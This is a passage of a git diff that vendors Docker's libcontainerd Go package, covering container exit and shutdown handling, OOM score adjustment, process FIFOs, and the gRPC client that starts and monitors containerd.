+	ctr.client.lock(ctr.containerID)
+
+	// Assume the container has exited
+	si := StateInfo{
+		CommonStateInfo: CommonStateInfo{
+			State:     StateExit,
+			ExitCode:  uint32(exitCode),
+			Pid:       process.systemPid,
+			ProcessID: process.friendlyName,
+		},
+		UpdatePending: false,
+	}
+
+	// But it could have been an exec'd process which exited
+	if !isFirstProcessToStart {
+		si.State = StateExitProcess
+		ctr.cleanProcess(process.friendlyName)
+	} else {
+		updatePending, err := ctr.hcsContainer.HasPendingUpdates()
+		if err != nil {
+			logrus.Warnf("libcontainerd: HasPendingUpdates() failed (container may have been killed): %s", err)
+		} else {
+			si.UpdatePending = updatePending
+		}
+
+		logrus.Debugf("libcontainerd: shutting down container %s", ctr.containerID)
+		if err := ctr.shutdown(); err != nil {
+			logrus.Debugf("libcontainerd: failed to shutdown container %s", ctr.containerID)
+		} else {
+			logrus.Debugf("libcontainerd: completed shutting down container %s", ctr.containerID)
+		}
+		if err := ctr.hcsContainer.Close(); err != nil {
+			logrus.Error(err)
+		}
+
+		// Remove process from list if we have exited
+		if si.State == StateExit {
+			ctr.client.deleteContainer(ctr.containerID)
+		}
+	}
+
+	if err := process.hcsProcess.Close(); err != nil {
+		logrus.Errorf("libcontainerd: hcsProcess.Close(): %v", err)
+	}
+
+	// Unlock here before we call back into the daemon to update state
+	ctr.client.unlock(ctr.containerID)
+
+	// Call into the backend to notify it of the state change.
+	logrus.Debugf("libcontainerd: waitExit() calling backend.StateChanged %+v", si)
+	if err := ctr.client.backend.StateChanged(ctr.containerID, si); err != nil {
+		logrus.Error(err)
+	}
+
+	logrus.Debugf("libcontainerd: waitExit() completed OK, %+v", si)
+
+	return nil
+}
+
+// cleanProcess removes process from the map.
+// Caller needs to lock container ID before calling this method.
+func (ctr *container) cleanProcess(id string) {
+	delete(ctr.processes, id)
+}
+
+// shutdown shuts down the container in HCS
+// Caller needs to lock container ID before calling this method.
+func (ctr *container) shutdown() error {
+	const shutdownTimeout = time.Minute * 5
+	err := ctr.hcsContainer.Shutdown()
+	if hcsshim.IsPending(err) {
+		// Explicit timeout to avoid a (remote) possibility that shutdown hangs indefinitely.
+		err = ctr.hcsContainer.WaitTimeout(shutdownTimeout)
+	} else if hcsshim.IsAlreadyStopped(err) {
+		err = nil
+	}
+
+	if err != nil {
+		logrus.Debugf("libcontainerd: error shutting down container %s %v calling terminate", ctr.containerID, err)
+		if err := ctr.terminate(); err != nil {
+			return err
+		}
+		return err
+	}
+
+	return nil
+}
+
+// terminate terminates the container in HCS
+// Caller needs to lock container ID before calling this method.
+func (ctr *container) terminate() error {
+	const terminateTimeout = time.Minute * 5
+	err := ctr.hcsContainer.Terminate()
+
+	if hcsshim.IsPending(err) {
+		err = ctr.hcsContainer.WaitTimeout(terminateTimeout)
+	} else if hcsshim.IsAlreadyStopped(err) {
+		err = nil
+	}
+
+	if err != nil {
+		logrus.Debugf("libcontainerd: error terminating container %s %v", ctr.containerID, err)
+		return err
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/oom_linux.go b/vendor/github.com/docker/docker/libcontainerd/oom_linux.go
new file mode 100644
index 0000000000..e126b7a550
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/oom_linux.go
@@ -0,0 +1,31 @@
+package libcontainerd
+
+import (
+	"fmt"
+	"os"
+	"strconv"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/opencontainers/runc/libcontainer/system"
+)
+
+func setOOMScore(pid, score int) error {
+	oomScoreAdjPath := fmt.Sprintf("/proc/%d/oom_score_adj", pid)
+	f, err := os.OpenFile(oomScoreAdjPath, os.O_WRONLY, 0)
+	if err != nil {
+		return err
+	}
+	stringScore := strconv.Itoa(score)
+	_, err = f.WriteString(stringScore)
+	f.Close()
+	if os.IsPermission(err) {
+		// Setting oom_score_adj does not work in an
+		// unprivileged container. Ignore the error, but log
+		// it if we appear not to be in that situation.
+		if !system.RunningInUserNS() {
+			logrus.Debugf("Permission denied writing %q to %s", stringScore, oomScoreAdjPath)
+		}
+		return nil
+	}
+	return err
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/oom_solaris.go b/vendor/github.com/docker/docker/libcontainerd/oom_solaris.go
new file mode 100644
index 0000000000..2ebe5e87cf
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/oom_solaris.go
@@ -0,0 +1,5 @@
+package libcontainerd
+
+func setOOMScore(pid, score int) error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go b/vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go
new file mode 100644
index 0000000000..4f3766d95c
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go
@@ -0,0 +1,42 @@
+// +build !windows
+
+package libcontainerd
+
+import (
+	"sync"
+)
+
+// pauseMonitor is helper to get notifications from pause state changes.
+type pauseMonitor struct {
+	sync.Mutex
+	waiters map[string][]chan struct{}
+}
+
+func (m *pauseMonitor) handle(t string) {
+	m.Lock()
+	defer m.Unlock()
+	if m.waiters == nil {
+		return
+	}
+	q, ok := m.waiters[t]
+	if !ok {
+		return
+	}
+	if len(q) > 0 {
+		close(q[0])
+		m.waiters[t] = q[1:]
+	}
+}
+
+func (m *pauseMonitor) append(t string, waiter chan struct{}) {
+	m.Lock()
+	defer m.Unlock()
+	if m.waiters == nil {
+		m.waiters = make(map[string][]chan struct{})
+	}
+	_, ok := m.waiters[t]
+	if !ok {
+		m.waiters[t] = make([]chan struct{}, 0)
+	}
+	m.waiters[t] = append(m.waiters[t], waiter)
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/process.go b/vendor/github.com/docker/docker/libcontainerd/process.go
new file mode 100644
index 0000000000..57562c8789
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/process.go
@@ -0,0 +1,18 @@
+package libcontainerd
+
+// processCommon are the platform common fields as part of the process structure
+// which keeps the state for the main container process, as well as any exec
+// processes.
+type processCommon struct {
+	client *client
+
+	// containerID is the Container ID
+	containerID string
+
+	// friendlyName is an identifier for the process (or `InitFriendlyName`
+	// for the first process)
+	friendlyName string
+
+	// systemPid is the PID of the main container process
+	systemPid uint32
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/process_unix.go b/vendor/github.com/docker/docker/libcontainerd/process_unix.go
new file mode 100644
index 0000000000..506fca6e11
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/process_unix.go
@@ -0,0 +1,107 @@
+// +build linux solaris
+
+package libcontainerd
+
+import (
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	goruntime "runtime"
+	"strings"
+
+	containerd "github.com/docker/containerd/api/grpc/types"
+	"github.com/tonistiigi/fifo"
+	"golang.org/x/net/context"
+	"golang.org/x/sys/unix"
+)
+
+var fdNames = map[int]string{
+	unix.Stdin:  "stdin",
+	unix.Stdout: "stdout",
+	unix.Stderr: "stderr",
+}
+
+// process keeps the state for both main container process and exec process.
+type process struct {
+	processCommon
+
+	// Platform specific fields are below here.
+	dir string
+}
+
+func (p *process) openFifos(ctx context.Context, terminal bool) (pipe *IOPipe, err error) {
+	if err := os.MkdirAll(p.dir, 0700); err != nil {
+		return nil, err
+	}
+
+	io := &IOPipe{}
+
+	io.Stdin, err = fifo.OpenFifo(ctx, p.fifo(unix.Stdin), unix.O_WRONLY|unix.O_CREAT|unix.O_NONBLOCK, 0700)
+	if err != nil {
+		return nil, err
+	}
+
+	defer func() {
+		if err != nil {
+			io.Stdin.Close()
+		}
+	}()
+
+	io.Stdout, err = fifo.OpenFifo(ctx, p.fifo(unix.Stdout), unix.O_RDONLY|unix.O_CREAT|unix.O_NONBLOCK, 0700)
+	if err != nil {
+		return nil, err
+	}
+
+	defer func() {
+		if err != nil {
+			io.Stdout.Close()
+		}
+	}()
+
+	if goruntime.GOOS == "solaris" || !terminal {
+		// For Solaris terminal handling is done exclusively by the runtime therefore we make no distinction
+		// in the processing for terminal and !terminal cases.
+		io.Stderr, err = fifo.OpenFifo(ctx, p.fifo(unix.Stderr), unix.O_RDONLY|unix.O_CREAT|unix.O_NONBLOCK, 0700)
+		if err != nil {
+			return nil, err
+		}
+		defer func() {
+			if err != nil {
+				io.Stderr.Close()
+			}
+		}()
+	} else {
+		io.Stderr = ioutil.NopCloser(emptyReader{})
+	}
+
+	return io, nil
+}
+
+func (p *process) sendCloseStdin() error {
+	_, err := p.client.remote.apiClient.UpdateProcess(context.Background(), &containerd.UpdateProcessRequest{
+		Id:         p.containerID,
+		Pid:        p.friendlyName,
+		CloseStdin: true,
+	})
+	if err != nil && (strings.Contains(err.Error(), "container not found") || strings.Contains(err.Error(), "process not found")) {
+		return nil
+	}
+	return err
+}
+
+func (p *process) closeFifos(io *IOPipe) {
+	io.Stdin.Close()
+	io.Stdout.Close()
+	io.Stderr.Close()
+}
+
+type emptyReader struct{}
+
+func (r emptyReader) Read(b []byte) (int, error) {
+	return 0, io.EOF
+}
+
+func (p *process) fifo(index int) string {
+	return filepath.Join(p.dir, p.friendlyName+"-"+fdNames[index])
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/process_windows.go b/vendor/github.com/docker/docker/libcontainerd/process_windows.go
new file mode 100644
index 0000000000..57ecc948d0
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/process_windows.go
@@ -0,0 +1,51 @@
+package libcontainerd
+
+import (
+	"io"
+	"sync"
+
+	"github.com/Microsoft/hcsshim"
+	"github.com/docker/docker/pkg/ioutils"
+)
+
+// process keeps the state for both main container process and exec process.
+type process struct {
+	processCommon
+
+	// Platform specific fields are below here.
+
+	// commandLine is to support returning summary information for docker top
+	commandLine string
+	hcsProcess  hcsshim.Process
+}
+
+type autoClosingReader struct {
+	io.ReadCloser
+	sync.Once
+}
+
+func (r *autoClosingReader) Read(b []byte) (n int, err error) {
+	n, err = r.ReadCloser.Read(b)
+	if err == io.EOF {
+		r.Once.Do(func() { r.ReadCloser.Close() })
+	}
+	return
+}
+
+func createStdInCloser(pipe io.WriteCloser, process hcsshim.Process) io.WriteCloser {
+	return ioutils.NewWriteCloserWrapper(pipe, func() error {
+		if err := pipe.Close(); err != nil {
+			return err
+		}
+
+		err := process.CloseStdin()
+		if err != nil && !hcsshim.IsNotExist(err) && !hcsshim.IsAlreadyClosed(err) {
+			// This error will occur if the compute system is currently shutting down
+			if perr, ok := err.(*hcsshim.ProcessError); ok && perr.Err != hcsshim.ErrVmcomputeOperationInvalidState {
+				return err
+			}
+		}
+
+		return nil
+	})
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/queue_unix.go b/vendor/github.com/docker/docker/libcontainerd/queue_unix.go
new file mode 100644
index 0000000000..b848b9872b
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/queue_unix.go
@@ -0,0 +1,31 @@
+// +build linux solaris
+
+package libcontainerd
+
+import "sync"
+
+type queue struct {
+	sync.Mutex
+	fns map[string]chan struct{}
+}
+
+func (q *queue) append(id string, f func()) {
+	q.Lock()
+	defer q.Unlock()
+
+	if q.fns == nil {
+		q.fns = make(map[string]chan struct{})
+	}
+
+	done := make(chan struct{})
+
+	fn, ok := q.fns[id]
+	q.fns[id] = done
+	go func() {
+		if ok {
+			<-fn
+		}
+		f()
+		close(done)
+	}()
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/remote.go b/vendor/github.com/docker/docker/libcontainerd/remote.go
new file mode 100644
index 0000000000..9031e3ae7d
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/remote.go
@@ -0,0 +1,20 @@
+package libcontainerd
+
+// Remote on Linux defines the accesspoint to the containerd grpc API.
+// Remote on Windows is largely an unimplemented interface as there is
+// no remote containerd.
+type Remote interface {
+	// Client returns a new Client instance connected with given Backend.
+	Client(Backend) (Client, error)
+	// Cleanup stops containerd if it was started by libcontainerd.
+	// Note this is not used on Windows as there is no remote containerd.
+	Cleanup()
+	// UpdateOptions allows various remote options to be updated at runtime.
+	UpdateOptions(...RemoteOption) error
+}
+
+// RemoteOption allows to configure parameters of remotes.
+// This is unused on Windows.
+type RemoteOption interface {
+	Apply(Remote) error
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_unix.go b/vendor/github.com/docker/docker/libcontainerd/remote_unix.go
new file mode 100644
index 0000000000..64a28646be
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/remote_unix.go
@@ -0,0 +1,544 @@
+// +build linux solaris
+
+package libcontainerd
+
+import (
+	"fmt"
+	"io"
+	"io/ioutil"
+	"log"
+	"net"
+	"os"
+	"os/exec"
+	"path/filepath"
+	goruntime "runtime"
+	"strconv"
+	"strings"
+	"sync"
+	"syscall"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	containerd "github.com/docker/containerd/api/grpc/types"
+	"github.com/docker/docker/pkg/locker"
+	sysinfo "github.com/docker/docker/pkg/system"
+	"github.com/docker/docker/utils"
+	"github.com/golang/protobuf/ptypes"
+	"github.com/golang/protobuf/ptypes/timestamp"
+	"golang.org/x/net/context"
+	"google.golang.org/grpc"
+	"google.golang.org/grpc/grpclog"
+	"google.golang.org/grpc/health/grpc_health_v1"
+	"google.golang.org/grpc/transport"
+)
+
+const (
+	maxConnectionRetryCount      = 3
+	containerdHealthCheckTimeout = 3 * time.Second
+	containerdShutdownTimeout    = 15 * time.Second
+	containerdBinary             = "docker-containerd"
+	containerdPidFilename        = "docker-containerd.pid"
+	containerdSockFilename       = "docker-containerd.sock"
+	containerdStateDir           = "containerd"
+	eventTimestampFilename       = "event.ts"
+)
+
+type remote struct {
+	sync.RWMutex
+	apiClient            containerd.APIClient
+	daemonPid            int
+	stateDir             string
+	rpcAddr              string
+	startDaemon          bool
+	closeManually        bool
+	debugLog             bool
+	rpcConn              *grpc.ClientConn
+	clients              []*client
+	eventTsPath          string
+	runtime              string
+	runtimeArgs          []string
+	daemonWaitCh         chan struct{}
+	liveRestore          bool
+	oomScore             int
+	restoreFromTimestamp *timestamp.Timestamp
+}
+
+// New creates a fresh instance of libcontainerd remote.
+func New(stateDir string, options ...RemoteOption) (_ Remote, err error) {
+	defer func() {
+		if err != nil {
+			err = fmt.Errorf("Failed to connect to containerd. Please make sure containerd is installed in your PATH or you have specified the correct address. Got error: %v", err)
+		}
+	}()
+	r := &remote{
+		stateDir:    stateDir,
+		daemonPid:   -1,
+		eventTsPath: filepath.Join(stateDir, eventTimestampFilename),
+	}
+	for _, option := range options {
+		if err := option.Apply(r); err != nil {
+			return nil, err
+		}
+	}
+
+	if err := sysinfo.MkdirAll(stateDir, 0700); err != nil {
+		return nil, err
+	}
+
+	if r.rpcAddr == "" {
+		r.rpcAddr = filepath.Join(stateDir, containerdSockFilename)
+	}
+
+	if r.startDaemon {
+		if err := r.runContainerdDaemon(); err != nil {
+			return nil, err
+		}
+	}
+
+	// don't output the grpc reconnect logging
+	grpclog.SetLogger(log.New(ioutil.Discard, "", log.LstdFlags))
+	dialOpts := append([]grpc.DialOption{grpc.WithInsecure()},
+		grpc.WithDialer(func(addr string, timeout time.Duration) (net.Conn, error) {
+			return net.DialTimeout("unix", addr, timeout)
+		}),
+	)
+	conn, err := grpc.Dial(r.rpcAddr, dialOpts...)
+	if err != nil {
+		return nil, fmt.Errorf("error connecting to containerd: %v", err)
+	}
+
+	r.rpcConn = conn
+	r.apiClient = containerd.NewAPIClient(conn)
+
+	// Get the timestamp to restore from
+	t := r.getLastEventTimestamp()
+	tsp, err := ptypes.TimestampProto(t)
+	if err != nil {
+		logrus.Errorf("libcontainerd: failed to convert timestamp: %q", err)
+	}
+	r.restoreFromTimestamp = tsp
+
+	go r.handleConnectionChange()
+
+	if err := r.startEventsMonitor(); err != nil {
+		return nil, err
+	}
+
+	return r, nil
+}
+
+func (r *remote) UpdateOptions(options ...RemoteOption) error {
+	for _, option := range options {
+		if err := option.Apply(r); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+func (r *remote) handleConnectionChange() {
+	var transientFailureCount = 0
+
+	ticker := time.NewTicker(500 * time.Millisecond)
+	defer ticker.Stop()
+	healthClient := grpc_health_v1.NewHealthClient(r.rpcConn)
+
+	for {
+		<-ticker.C
+		ctx, cancel := context.WithTimeout(context.Background(), containerdHealthCheckTimeout)
+		_, err := healthClient.Check(ctx, &grpc_health_v1.HealthCheckRequest{})
+		cancel()
+		if err == nil {
+			continue
+		}
+
+		logrus.Debugf("libcontainerd: containerd health check returned error: %v", err)
+
+		if r.daemonPid != -1 {
+			if strings.Contains(err.Error(), "is closing") {
+				// Well, we asked for it to stop, just return
+				return
+			}
+			// all other errors are transient
+			// Reset state to be notified of next failure
+			transientFailureCount++
+			if transientFailureCount >= maxConnectionRetryCount {
+				transientFailureCount = 0
+				if utils.IsProcessAlive(r.daemonPid) {
+					utils.KillProcess(r.daemonPid)
+				}
+				<-r.daemonWaitCh
+				if err := r.runContainerdDaemon(); err != nil { //FIXME: Handle error
+					logrus.Errorf("libcontainerd: error restarting containerd: %v", err)
+				}
+				continue
+			}
+		}
+	}
+}
+
+func (r *remote) Cleanup() {
+	if r.daemonPid == -1 {
+		return
+	}
+	r.closeManually = true
+	r.rpcConn.Close()
+	// Ask the daemon to quit
+	syscall.Kill(r.daemonPid, syscall.SIGTERM)
+
+	// Wait up to 15secs for it to stop
+	for i := time.Duration(0); i < containerdShutdownTimeout; i += time.Second {
+		if !utils.IsProcessAlive(r.daemonPid) {
+			break
+		}
+		time.Sleep(time.Second)
+	}
+
+	if utils.IsProcessAlive(r.daemonPid) {
+		logrus.Warnf("libcontainerd: containerd (%d) didn't stop within 15 secs, killing it\n", r.daemonPid)
+		syscall.Kill(r.daemonPid, syscall.SIGKILL)
+	}
+
+	// cleanup some files
+	os.Remove(filepath.Join(r.stateDir, containerdPidFilename))
+	os.Remove(filepath.Join(r.stateDir, containerdSockFilename))
+}
+
+func (r *remote) Client(b Backend) (Client, error) {
+	c := &client{
+		clientCommon: clientCommon{
+			backend:    b,
+			containers: make(map[string]*container),
+			locker:     locker.New(),
+		},
+		remote:        r,
+		exitNotifiers: make(map[string]*exitNotifier),
+		liveRestore:   r.liveRestore,
+	}
+
+	r.Lock()
+	r.clients = append(r.clients, c)
+	r.Unlock()
+	return c, nil
+}
+
+func (r *remote) updateEventTimestamp(t time.Time) {
+	f, err := os.OpenFile(r.eventTsPath, syscall.O_CREAT|syscall.O_WRONLY|syscall.O_TRUNC, 0600)
+	if err != nil {
+		logrus.Warnf("libcontainerd: failed to open event timestamp file: %v", err)
+		return
+	}
+	defer f.Close()
+
+	b, err := t.MarshalText()
+	if err != nil {
+		logrus.Warnf("libcontainerd: failed to encode timestamp: %v", err)
+		return
+	}
+
+	n, err := f.Write(b)
+	if err != nil || n != len(b) {
+		logrus.Warnf("libcontainerd: failed to update event timestamp file: %v", err)
+		f.Truncate(0)
+		return
+	}
+}
+
+func (r *remote) getLastEventTimestamp() time.Time {
+	t := time.Now()
+
+	fi, err := os.Stat(r.eventTsPath)
+	if os.IsNotExist(err) || fi.Size() == 0 {
+		return t
+	}
+
+	f, err := os.Open(r.eventTsPath)
+	if err != nil {
+		logrus.Warnf("libcontainerd: Unable to access last event ts: %v", err)
+		return t
+	}
+	defer f.Close()
+
+	b := make([]byte, fi.Size())
+	n, err := f.Read(b)
+	if err != nil || n != len(b) {
+		logrus.Warnf("libcontainerd: Unable to read last event ts: %v", err)
+		return t
+	}
+
+	t.UnmarshalText(b)
+
+	return t
+}
+
+func (r *remote) startEventsMonitor() error {
+	// First, get past events
+	t := r.getLastEventTimestamp()
+	tsp, err := ptypes.TimestampProto(t)
+	if err != nil {
+		logrus.Errorf("libcontainerd: failed to convert timestamp: %q", err)
+	}
+	er := &containerd.EventsRequest{
+		Timestamp: tsp,
+	}
+	events, err := r.apiClient.Events(context.Background(), er, grpc.FailFast(false))
+	if err != nil {
+		return err
+	}
+	go r.handleEventStream(events)
+	return nil
+}
+
+func (r *remote) handleEventStream(events containerd.API_EventsClient) {
+	for {
+		e, err := events.Recv()
+		if err != nil {
+			if grpc.ErrorDesc(err) == transport.ErrConnClosing.Desc &&
+				r.closeManually {
+				// ignore error if grpc remote connection is closed manually
+				return
+			}
+			logrus.Errorf("libcontainerd: failed to receive event from containerd: %v", err)
+			go r.startEventsMonitor()
+			return
+		}
+
+		logrus.Debugf("libcontainerd: received containerd event: %#v", e)
+
+		var container *container
+		var c *client
+		r.RLock()
+		for _, c = range r.clients {
+			container, err = c.getContainer(e.Id)
+			if err == nil {
+				break
+			}
+		}
+		r.RUnlock()
+		if container == nil {
+			logrus.Warnf("libcontainerd: unknown container %s", e.Id)
+			continue
+		}
+
+		if err := container.handleEvent(e); err != nil {
+			logrus.Errorf("libcontainerd: error processing state change for %s: %v", e.Id, err)
+		}
+
+		tsp, err := ptypes.Timestamp(e.Timestamp)
+		if err != nil {
+			logrus.Errorf("libcontainerd: failed to convert event timestamp: %q", err)
+			continue
+		}
+
+		r.updateEventTimestamp(tsp)
+	}
+}
+
+func (r *remote) runContainerdDaemon() error {
+	pidFilename := filepath.Join(r.stateDir, containerdPidFilename)
+	f, err := os.OpenFile(pidFilename, os.O_RDWR|os.O_CREATE, 0600)
+	if err != nil {
+		return err
+	}
+	defer f.Close()
+
+	// File exist, check if the daemon is alive
+	b := make([]byte, 8)
+	n, err := f.Read(b)
+	if err != nil && err != io.EOF {
+		return err
+	}
+
+	if n > 0 {
+		pid, err := strconv.ParseUint(string(b[:n]), 10, 64)
+		if err != nil {
+			return err
+		}
+		if utils.IsProcessAlive(int(pid)) {
+			logrus.Infof("libcontainerd: previous instance of containerd still alive (%d)", pid)
+			r.daemonPid = int(pid)
+			return nil
+		}
+	}
+
+	// rewind the file
+	_, err = f.Seek(0, os.SEEK_SET)
+	if err != nil {
+		return err
+	}
+
+	// Truncate it
+	err = f.Truncate(0)
+	if err != nil {
+		return err
+	}
+
+	// Start a new instance
+	args := []string{
+		"-l", fmt.Sprintf("unix://%s", r.rpcAddr),
+		"--metrics-interval=0",
+		"--start-timeout", "2m",
+		"--state-dir", filepath.Join(r.stateDir, containerdStateDir),
+	}
+	if goruntime.GOOS == "solaris" {
+		args = append(args, "--shim", "containerd-shim", "--runtime", "runc")
+	} else {
+		args = append(args, "--shim", "docker-containerd-shim")
+		if r.runtime != "" {
+			args = append(args, "--runtime")
+			args = append(args, r.runtime)
+		}
+	}
+	if r.debugLog {
+		args = append(args, "--debug")
+	}
+	if len(r.runtimeArgs) > 0 {
+		for _, v := range r.runtimeArgs {
+			args = append(args, "--runtime-args")
+			args = append(args, v)
+		}
+		logrus.Debugf("libcontainerd: runContainerdDaemon: runtimeArgs: %s", args)
+	}
+
+	cmd := exec.Command(containerdBinary, args...)
+	// redirect containerd logs to docker logs
+	cmd.Stdout = os.Stdout
+	cmd.Stderr = os.Stderr
+	cmd.SysProcAttr = setSysProcAttr(true)
+	cmd.Env = nil
+	// clear the NOTIFY_SOCKET from the env when starting containerd
+	for _, e := range os.Environ() {
+		if !strings.HasPrefix(e, "NOTIFY_SOCKET") {
+			cmd.Env = append(cmd.Env, e)
+		}
+	}
+	if err := cmd.Start(); err != nil {
+		return err
+	}
+	logrus.Infof("libcontainerd: new containerd process, pid: %d", cmd.Process.Pid)
+	if err := setOOMScore(cmd.Process.Pid, r.oomScore); err != nil {
+		utils.KillProcess(cmd.Process.Pid)
+		return err
+	}
+	if _, err := f.WriteString(fmt.Sprintf("%d", cmd.Process.Pid)); err != nil {
+		utils.KillProcess(cmd.Process.Pid)
+		return err
+	}
+
+	r.daemonWaitCh = make(chan struct{})
+	go func() {
+		cmd.Wait()
+		close(r.daemonWaitCh)
+	}() // Reap our child when needed
+	r.daemonPid = cmd.Process.Pid
+	return nil
+}
+
+// WithRemoteAddr sets the external containerd socket to connect to.
+func WithRemoteAddr(addr string) RemoteOption {
+	return rpcAddr(addr)
+}
+
+type rpcAddr string
+
+func (a rpcAddr) Apply(r Remote) error {
+	if remote, ok := r.(*remote); ok {
+		remote.rpcAddr = string(a)
+		return nil
+	}
+	return fmt.Errorf("WithRemoteAddr option not supported for this remote")
+}
+
+// WithRuntimePath sets the path of the runtime to be used as the
+// default by containerd
+func WithRuntimePath(rt string) RemoteOption {
+	return runtimePath(rt)
+}
+
+type runtimePath string
+
+func (rt runtimePath) Apply(r Remote) error {
+	if remote, ok := r.(*remote); ok {
+		remote.runtime = string(rt)
+		return nil
+	}
+	return fmt.Errorf("WithRuntime option not supported for this remote")
+}
+
+// WithRuntimeArgs sets the list of runtime args passed to containerd
+func WithRuntimeArgs(args []string) RemoteOption {
+	return runtimeArgs(args)
+}
+
+type runtimeArgs []string
+
+func (rt runtimeArgs) Apply(r Remote) error {
+	if remote, ok := r.(*remote); ok {
+		remote.runtimeArgs = rt
+		return nil
+	}
+	return fmt.Errorf("WithRuntimeArgs option not supported for this remote")
+}
+
+// WithStartDaemon defines if libcontainerd should also run containerd daemon.
+func WithStartDaemon(start bool) RemoteOption {
+	return startDaemon(start)
+}
+
+type startDaemon bool
+
+func (s startDaemon) Apply(r Remote) error {
+	if remote, ok := r.(*remote); ok {
+		remote.startDaemon = bool(s)
+		return nil
+	}
+	return fmt.Errorf("WithStartDaemon option not supported for this remote")
+}
+
+// WithDebugLog defines if containerd debug logs will be enabled for daemon.
+func WithDebugLog(debug bool) RemoteOption {
+	return debugLog(debug)
+}
+
+type debugLog bool
+
+func (d debugLog) Apply(r Remote) error {
+	if remote, ok := r.(*remote); ok {
+		remote.debugLog = bool(d)
+		return nil
+	}
+	return fmt.Errorf("WithDebugLog option not supported for this remote")
+}
+
+// WithLiveRestore defines if containers are stopped on shutdown or restored.
+func WithLiveRestore(v bool) RemoteOption {
+	return liveRestore(v)
+}
+
+type liveRestore bool
+
+func (l liveRestore) Apply(r Remote) error {
+	if remote, ok := r.(*remote); ok {
+		remote.liveRestore = bool(l)
+		for _, c := range remote.clients {
+			c.liveRestore = bool(l)
+		}
+		return nil
+	}
+	return fmt.Errorf("WithLiveRestore option not supported for this remote")
+}
+
+// WithOOMScore defines the oom_score_adj to set for the containerd process.
+func WithOOMScore(score int) RemoteOption {
+	return oomScore(score)
+}
+
+type oomScore int
+
+func (o oomScore) Apply(r Remote) error {
+	if remote, ok := r.(*remote); ok {
+		remote.oomScore = int(o)
+		return nil
+	}
+	return fmt.Errorf("WithOOMScore option not supported for this remote")
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_windows.go b/vendor/github.com/docker/docker/libcontainerd/remote_windows.go
new file mode 100644
index 0000000000..74c10447bb
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/remote_windows.go
@@ -0,0 +1,36 @@
+package libcontainerd
+
+import "github.com/docker/docker/pkg/locker"
+
+type remote struct {
+}
+
+func (r *remote) Client(b Backend) (Client, error) {
+	c := &client{
+		clientCommon: clientCommon{
+			backend:    b,
+			containers: make(map[string]*container),
+			locker:     locker.New(),
+		},
+	}
+	return c, nil
+}
+
+// Cleanup is a no-op on Windows. It is here to implement the interface.
+func (r *remote) Cleanup() {
+}
+
+func (r *remote) UpdateOptions(opts ...RemoteOption) error {
+	return nil
+}
+
+// New creates a fresh instance of libcontainerd remote. On Windows,
+// this is not used as there is no remote containerd process.
+func New(_ string, _ ...RemoteOption) (Remote, error) {
+	return &remote{}, nil
+}
+
+// WithLiveRestore is a noop on windows.
+func WithLiveRestore(v bool) RemoteOption {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/types.go b/vendor/github.com/docker/docker/libcontainerd/types.go
new file mode 100644
index 0000000000..3d981e3371
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/types.go
@@ -0,0 +1,75 @@
+package libcontainerd
+
+import (
+	"io"
+
+	containerd "github.com/docker/containerd/api/grpc/types"
+	"github.com/opencontainers/runtime-spec/specs-go"
+	"golang.org/x/net/context"
+)
+
+// State constants used in state change reporting.
+const (
+	StateStart       = "start-container"
+	StatePause       = "pause"
+	StateResume      = "resume"
+	StateExit        = "exit"
+	StateRestore     = "restore"
+	StateExitProcess = "exit-process"
+	StateOOM         = "oom" // fake state
+)
+
+// CommonStateInfo contains the state info common to all platforms.
+type CommonStateInfo struct { // FIXME: event?
+	State     string
+	Pid       uint32
+	ExitCode  uint32
+	ProcessID string
+}
+
+// Backend defines callbacks that the client of the library needs to implement.
+type Backend interface {
+	StateChanged(containerID string, state StateInfo) error
+}
+
+// Client provides access to containerd features.
+type Client interface {
+	GetServerVersion(ctx context.Context) (*ServerVersion, error)
+	Create(containerID string, checkpoint string, checkpointDir string, spec specs.Spec, attachStdio StdioCallback, options ...CreateOption) error
+	Signal(containerID string, sig int) error
+	SignalProcess(containerID string, processFriendlyName string, sig int) error
+	AddProcess(ctx context.Context, containerID, processFriendlyName string, process Process, attachStdio StdioCallback) (int, error)
+	Resize(containerID, processFriendlyName string, width, height int) error
+	Pause(containerID string) error
+	Resume(containerID string) error
+	Restore(containerID string, attachStdio StdioCallback, options ...CreateOption) error
+	Stats(containerID string) (*Stats, error)
+	GetPidsForContainer(containerID string) ([]int, error)
+	Summary(containerID string) ([]Summary, error)
+	UpdateResources(containerID string, resources Resources) error
+	CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error
+	DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error
+	ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error)
+}
+
+// CreateOption allows to configure parameters of container creation.
+type CreateOption interface {
+	Apply(interface{}) error
+}
+
+// StdioCallback is called to connect a container or process stdio.
+type StdioCallback func(IOPipe) error
+
+// IOPipe contains the stdio streams.
+type IOPipe struct {
+	Stdin    io.WriteCloser
+	Stdout   io.ReadCloser
+	Stderr   io.ReadCloser
